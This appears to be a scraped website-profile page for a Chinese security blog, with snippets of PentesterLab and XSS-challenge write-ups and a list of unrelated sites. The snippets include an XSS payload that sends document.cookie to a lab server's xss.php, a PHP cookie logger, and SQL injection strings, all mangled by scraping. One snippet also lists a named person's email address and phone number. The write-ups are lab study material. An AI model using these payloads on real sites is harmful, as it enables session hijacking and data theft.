old.blog.lightrains.org old.blog.lightrains.org

old.blog.lightrains.org

西风微雨的旧博客

旧博客,杂事纪录本

http://old.blog.lightrains.org/

WEBSITE DETAILS
SEO
PAGES
SIMILAR SITES

TRAFFIC RANK FOR OLD.BLOG.LIGHTRAINS.ORG

TODAY'S RATING

>1,000,000

TRAFFIC RANK - AVERAGE PER MONTH

BEST MONTH

June

AVERAGE PER DAY Of THE WEEK

HIGHEST TRAFFIC ON

Friday

TRAFFIC BY CITY

CUSTOMER REVIEWS

Average Rating: 4.1 out of 5 with 16 reviews
5 star
9
4 star
2
3 star
4
2 star
0
1 star
1

Hey there! Start your review of old.blog.lightrains.org

AVERAGE USER RATING

Write a Review

WEBSITE PREVIEW

Desktop Preview Tablet Preview Mobile Preview

LOAD TIME

1.5 seconds

CONTACTS AT OLD.BLOG.LIGHTRAINS.ORG

Login

TO VIEW CONTACTS

Remove Contacts

FOR PRIVACY ISSUES

CONTENT

SCORE

6.2

PAGE TITLE
西风微雨的旧博客 | old.blog.lightrains.org Reviews
<META>
DESCRIPTION
旧博客,杂事纪录本
<META>
KEYWORDS
1 西风微雨
2 旧博客
3 web安全
4 渗透测试
5
6 coupons
7 reviews
8 scam
9 fraud
10 hoax
CONTENT
Page content here
KEYWORDS ON
PAGE
php黑魔法,python,网络安全,writeup,生活随想,西风微雨,未曾见过的繁荣以及理想的恢弘,总有一天会和我相遇,coding,exploits,curious,sharing,作者 wester,分类 writeup,评论 暂无评论,标签 pentesterlab,在每篇文章评论框的text区域插入,img src=1 onerror=alert 1,时发现xss,于是,评论写入,xssphp内容,然后在cook txt中发现cookie,然后编辑页面cookie,name='='直接绕过认证
SERVER
nginx/1.10.1
POWERED BY
PHP/5.4.16
CONTENT-TYPE
utf-8
GOOGLE PREVIEW

西风微雨的旧博客 | old.blog.lightrains.org Reviews

https://old.blog.lightrains.org

旧博客,杂事纪录本

INTERNAL PAGES

old.blog.lightrains.org old.blog.lightrains.org
1

分类 网络安全 下的文章 - 西风微雨的旧博客

https://old.blog.lightrains.org/category/security

PentesterLab]XSS and MySQL FILE. Script document.write(' img src=http:/ 192.168.56.101/xss.php? Cookie=' document.cookie ' / '); /script. 192168.56.101为任意在同一网段的server,我这里为了简便就直接用的被攻击的服务器IP. Php $coo=$ GET['cookie']; $fp=fopen('cook.txt','a'); fwrite($fp,$coo); fclose($fp);? PentesterLab]web for pentester I. Http:/ 192.168.56.101/sqli/example1.php? Name=root' union select user(),version(),@ basedir,4,5%23. 过滤空格,换行符%0a绕过, 0b也可以,http:/ 192.168.56.101/sqli/example2.php? Name=hacker script alert(1) /script.

2

西风微雨的旧博客

https://old.blog.lightrains.org/page/3

Coding Exploits Curious Sharing. 享受coding带来的快乐,不会编程的hacker不是好hacker,Talk is cheap. 漏洞是具有灵魂的,回归漏洞本质,不断的Bypass,安全是一门平衡的艺术. Keep stupid,永远保持好奇心,这是人生态度,也是一个安全从业者的人生准则. Mysql use test; Database changed; mysql select * from user; - - - - - - - - - - - - id name password - - - - - - - - - - - - 1 admin admin 2 zephyrus zephyrus - - - - - - - - - - - - 2 rows in set (0.00 sec). Php $conn=mysql connect(localhost, root, ); if (! 这里就参照@瞌睡龙菊苣的总结 http:/ drops.wooyun.org/tips/123. 假 表示查询是错误的 (MySQL 报错/返回页面与原来不同).

3

标签 php 下的文章 - 西风微雨的旧博客

https://old.blog.lightrains.org/tag/php

After reading 'PHP Object Injection'. The original link http:/ securitycafe.ro/2015/01/05/understanding-php-object-injection/. Php object injection主要是由于PHP中的magic方法序列化引起,例如 construct()、 toString()、 destruct(). 例如 echo $obj; 应该显示些什么。 此方法必须返回一个字符串,否则将发出一条 E RECOVERABLE ERROR 级别的致命错误. 关于PHP中magic方法这里不再详细叙述,详细参照 http:/ php.net/manual/zh/language.oop5.php. The Blog zephyrus.log is an awesome blog. O:4:Blog:2:{s:4:name;s:12:zephyrus.log;s:3:adj;s:7:awesome;}. The Blog zephyrus.log is an awesome blog. Php $a='2...

4

[pentesterLab]XSS and MySQL FILE - 西风微雨的旧博客

https://old.blog.lightrains.org/write/xss-and-mysql-file.html

Raquo; [pentesterLab]XSS and MySQL FILE. PentesterLab]XSS and MySQL FILE. Script document.write(' img src=http:/ 192.168.56.101/xss.php? Cookie=' document.cookie ' / '); /script. 192168.56.101为任意在同一网段的server,我这里为了简便就直接用的被攻击的服务器IP. Php $coo=$ GET['cookie']; $fp=fopen('cook.txt','a'); fwrite($fp,$coo); fclose($fp);? 访问http:/ 192.168.56.101/admin即可进入后台管理. 在文章edit区域发现注入,http:/ 192.168.56.101/admin/edit.php? Http:/ 192.168.56.101/admin/edit.php? Id=0 union select 1,user(),3,4#. PentesterLab]web for pentester I.

5

西风微雨的旧博客

https://old.blog.lightrains.org/page/1

Coding Exploits Curious Sharing. 享受coding带来的快乐,不会编程的hacker不是好hacker,Talk is cheap. 漏洞是具有灵魂的,回归漏洞本质,不断的Bypass,安全是一门平衡的艺术. Keep stupid,永远保持好奇心,这是人生态度,也是一个安全从业者的人生准则. PentesterLab]XSS and MySQL FILE. Script document.write(' img src=http:/ 192.168.56.101/xss.php? Cookie=' document.cookie ' / '); /script. 192168.56.101为任意在同一网段的server,我这里为了简便就直接用的被攻击的服务器IP. Php $coo=$ GET['cookie']; $fp=fopen('cook.txt','a'); fwrite($fp,$coo); fclose($fp);? PentesterLab]web for pentester I. Name=hacker script alert(1) /script.

UPGRADE TO PREMIUM TO VIEW 14 MORE

TOTAL PAGES IN THIS WEBSITE

19

LINKS TO THIS WEBSITE

lightrains.org lightrains.org

e107 CMS <=2.1.2 权限提升漏洞分析

https://lightrains.org/e107-cms-privilege-escalation

You are being watched. 8226; Tag: Vuls Analysis. E107 CMS =2.1.2 权限提升漏洞分析. 原文链接: http:/ bobao.360.cn/learning/detail/3368.html. Version =2.1.2. 运行环境:macOS10.12.2 apache2.4.23 PHP5.6.27 Mysql5.7.16. E107 CMS版本 v2.1.2. 首先我们从rips的扫描报告 https:/ blog.ripstech.com/2016/e107-sql-injection-through-object-injection/中可以大致知道整个漏洞的触发. 变量关系注释 $ POST[‘updated data’]为base64编码的值,$new data是base64解码后的值是一个序列化的值,$changedUserData为反序列化后的值,是一个数组。 E107 handlers/mysql class.php. 1087 $ftype = isset($fieldTypes[$fn])? FieldTypes[$f...

lightrains.org lightrains.org

Vuls Analysis - Page 1 - 西风微雨(Wester's blog)

https://lightrains.org/tag/vuls-analysis

You are being watched. E107 CMS =2.1.2 权限提升漏洞分析. 原文链接: http:/ bobao.360.cn/learning/detail/3368.html 0x00.漏洞背景 e107 CMS是一个基于PHP、Bootstrap、Mysql的网站内容管理系统,可广泛用于个人博客、企业建站,在全球范围内使用较为广泛。 0x01漏洞影响版本 version =2.1.2 0x02.漏洞分析环境 运行环境:macOS10.12.2 apache2.4.23 PHP5.6.27 Mysql5.7.16 e107 CMS版本 v2.1…. 8226; Vuls Analysis. Roundcube v1.2.2命令执行漏洞分析. 本文翻译自https:/ blog.ripstech.com/2016/roundcube-command-execution-via-email/ ,有部分删改。 8226; Vuls Analysis. 8226; Vuls Analysis. Wester 2017,Host on qcloud.

lightrains.org lightrains.org

About me

https://lightrains.org/about-me

You are being watched. Work at Tencent security platform department. This site is using Attribution-NonCommercial-ShareAlike 4.0 International Protocol. Wester 2017,Host on qcloud. This theme is based on vno theme. You can find source code at GitHub. My old blog old.blog.lightrains.org.

lightrains.org lightrains.org

Threat books - 西风微雨(Wester's blog)

https://lightrains.org/tag/threat-books

You are being watched. 8226; Threat books. This site is using Attribution-NonCommercial-ShareAlike 4.0 International Protocol. Wester 2017,Host on qcloud. This theme is based on vno theme. You can find source code at GitHub. My old blog old.blog.lightrains.org.

lightrains.org lightrains.org

Google XSS Game

https://lightrains.org/google-xss-game

You are being watched. 8226; Tag: XSS. Challenge Address: https:/ xss-game.appspot.com. Title:Hello, world of XSS. Https:/ xss-game.appspot.com/level1/frame? Query= img src=1 onerror=alert(1). Fill this payload in textarea:. Https:/ xss-game.appspot.com/level3/frame#3' onmouseover=alert(1). We should delete the suffix. And as we all know,brower will ignore the 2nd src attribute. Https:/ xss-game.appspot.com/level3/frame#3' onmouseover=alert(1) src=cloud1. Attribute will be added in the.

lightrains.org lightrains.org

小议威胁情报feed

https://lightrains.org/threat-intelligence

You are being watched. 8226; Tag: Threat books. Http:/ init.icloud-analysis.com. Http:/ init.crash-analytics.com. Http:/ init.icloud-diagnostics.com. 姓名 Wang Long 邮箱 778560441@qq.com 手机 13276422520 地点 山东,济南. Https:/ www.sec-un.org/watcherlab-threat-intelligence-feed-please-feel-free-to-try.html. Https:/ www.sec-un.org/threat-intelligence-data-analysis-ip-feed.html. Scan qrcode,share this post. Roundcube v1.2.2命令执行漏洞分析. 8226; Tag: Vuls Analysis. 8226; Tag: XSS. Comments powered by Disqus.

lightrains.org lightrains.org

西风微雨(Wester's blog) - Page 2

https://lightrains.org/page/2

You are being watched. Challenge Address:https:/ xss-game.appspot.com Level 1 Title:Hello, world of XSS payload: https:/ xss-game.appspot.com/level1/frame? Query= img src=1 onerror=alert(1) Level 2 Title:Persistence is key Fill this payload in textarea: i…. 8226; Tag: XSS. From Wechall to Re-recognize 'Extractvalue()'. Problem Description: When you visit this link you receive a message. Submit the same message back to https:/ www.wechall.net/challenge/training/programming1/index.php?

lightrains.org lightrains.org

Roundcube v1.2.2命令执行漏洞分析

https://lightrains.org/roundcube-remote-command-execution

You are being watched. 8226; Tag: Vuls Analysis. Roundcube v1.2.2命令执行漏洞分析. 本文翻译自 https:/ blog.ripstech.com/2016/roundcube-command-execution-via-email/. 在这篇文章中,我们将会分析恶意用户如何通过Roundcube 1.2.2 = 1.0 发送一封电子邮件就可在远程操作系统上执行任意命令。 上述代码分析结果可以在我们的在线demo程序中获得 https:/ demo.ripstech.com/project/10/. 在Roundcube 1.2.2及更早版本中,用户可控的输入变量没有经过安全检查就传递到了PHP内置的高风险函数. 104 else if ($from string = rcmail email input format($from) { 105 if (preg match(‘/( S @ S )/‘, $from string, $m) 106 $from = trim($m1, ‘. 865 $result[] = $item; 86...

lightrains.org lightrains.org

XSS - 西风微雨(Wester's blog)

https://lightrains.org/tag/xss

You are being watched. Challenge Address:https:/ xss-game.appspot.com Level 1 Title:Hello, world of XSS payload: https:/ xss-game.appspot.com/level1/frame? Query= img src=1 onerror=alert(1) Level 2 Title:Persistence is key Fill this payload in textarea: i…. This site is using Attribution-NonCommercial-ShareAlike 4.0 International Protocol. Wester 2017,Host on qcloud. This theme is based on vno theme. You can find source code at GitHub. My old blog old.blog.lightrains.org.

UPGRADE TO PREMIUM TO VIEW 1 MORE

TOTAL LINKS TO THIS WEBSITE

10

OTHER SITES

old.bleckt.com old.bleckt.com

Рами Блект: Персональный сайт

Рассылка Рами, октябрь 2012. Надеюсь, что у вас жизнь становится все лучше и лучше во всех отношениях. А для того, чтобы это случилось предлагаю вам одно средство, которое я достаточно научно проверил. По крайней мере, все кто следовал этому - их жизнь резко улучшилась во всех отношениях. Давайте будем писать два предложения в день:. 1 С каждым днем моя жизнь становится все лучше и лучше во всех отношениях. Спасибо Богу! Читать весь текст ». Подкаст-интервью, посвященный понятию свободы. Audio:http:/ old...

old.bledzew.mserwer.pl old.bledzew.mserwer.pl

Bledzew - Najnowsze wydarzenia

Weronika, Bogumiła, Izydor. Struktura Urzędu Gminy Bledzew. Referat i samodzielne stanowiska Urzędu Gminy Bledzew - zakres czynności. Punkt Selektywnej Zbiórki Odpadów Komunalnych. Bledzew na starej fotografii. Herb i flaga gminy. Szkoła Podstawowa w Bledzewie. Szkoła Podstawowa w Templewie. Punkt Przedszkolny w Nowej Wsi. Przedszkole Gminne w Bledzewie. Kultura, rozrywka, sport, zabawa i inne. Gmina Bledzew z lotu ptaka. Zespoły śpiewacze i taneczne. Europejski Tydzień Sportu - sprawozdanie. Wydanie map...

old.blefjellsykehus.no old.blefjellsykehus.no

blefjellsykehus.no - This domain may be for sale!

Find the best information and most relevant links on all topics related to blefjellsykehus.no. This domain may be for sale!

old.blieskastel-bierbach.de old.blieskastel-bierbach.de

Blieskastel-Bierbach

Verbindung zur Datenbank nicht möglich!

old.blissmo.com old.blissmo.com

blissmo - blissmo, eco-friendly products

To receive exceptional organic and eco-friendly products each month right at your doorstep. Middot; blissmobox.com. Exceptional organic and eco products. Safer and better than conventional alternatives. Enter your email to start:. Higher design and quality lower toxicity and impact better for you and your family. Skip to: today's saver. Previously featured brands include:.

old.blog.lightrains.org old.blog.lightrains.org

西风微雨的旧博客

Coding Exploits Curious Sharing. 享受coding带来的快乐,不会编程的hacker不是好hacker,Talk is cheap. 漏洞是具有灵魂的,回归漏洞本质,不断的Bypass,安全是一门平衡的艺术. Keep stupid,永远保持好奇心,这是人生态度,也是一个安全从业者的人生准则. PentesterLab]XSS and MySQL FILE. Script document.write(' img src=http:/ 192.168.56.101/xss.php? Cookie=' document.cookie ' / '); /script. 192168.56.101为任意在同一网段的server,我这里为了简便就直接用的被攻击的服务器IP. Php $coo=$ GET['cookie']; $fp=fopen('cook.txt','a'); fwrite($fp,$coo); fclose($fp);? PentesterLab]web for pentester I. Name=hacker script alert(1) /script.

old.blog.neoocean.net old.blog.neoocean.net

게임 깎는 김노인

지금은 더 이상 업데이트 되지 않는 블로그. 문의: wjkim@neoocean.net. 전자책 ‘신’ 유감. 52280;고: http:/ gdf.inven.co.kr/viewtopic.php? Wjkim@neoocean.net / Ashley theme by Jxnblk.

old.blog.phusion.nl old.blog.phusion.nl

Phusion Blog -

Traveling Ruby 20150210: smaller, supports Ruby 2.2, Windows. By Hongli Lai on. February 9th, 2015. Allows you to create self-contained, “portable” Ruby binaries which can run on any Windows machine, any Linux distribution and any OS X machine. This allows Ruby app developers to distribute a single package to end users, without needing end users to first install Ruby or gems. There’s a little bit of a backstory behind this release. Last week I went to Amsterdam.rb’s MRI Implementors Panel. Although some ...

old.blog.ryancrum.org old.blog.ryancrum.org

MIGHTY EGGROLL! Productions

old.bloodbros.lt old.bloodbros.lt

Apache2 Ubuntu Default Page: It works

Apache2 Ubuntu Default Page. This is the default welcome page used to test the correct operation of the Apache2 server after installation on Ubuntu systems. It is based on the equivalent page on Debian, from which the Ubuntu Apache packaging is derived. If you can read this page, it means that the Apache HTTP server installed at this site is working properly. You should replace this file. Before continuing to operate your HTTP server. Package was installed on this server. Is always included from the main...

old.bloomsbury.org.uk old.bloomsbury.org.uk

Bloomsbury Central Baptist Church

At the top of Shaftesbury Avenue in London's West End, Bloomsbury Central Baptist Church is a community of Christians who have been serving the local community and the wider world since 1848. Our doors are open every day of the week and visitors are warmly welcome to our services of worship, music concerts, lunches and talks – or if they want to walk off the busy streets into a friendly place where they can meet others, pray or simply find quiet. Please bear with us during our transformation! Bloomsbury ...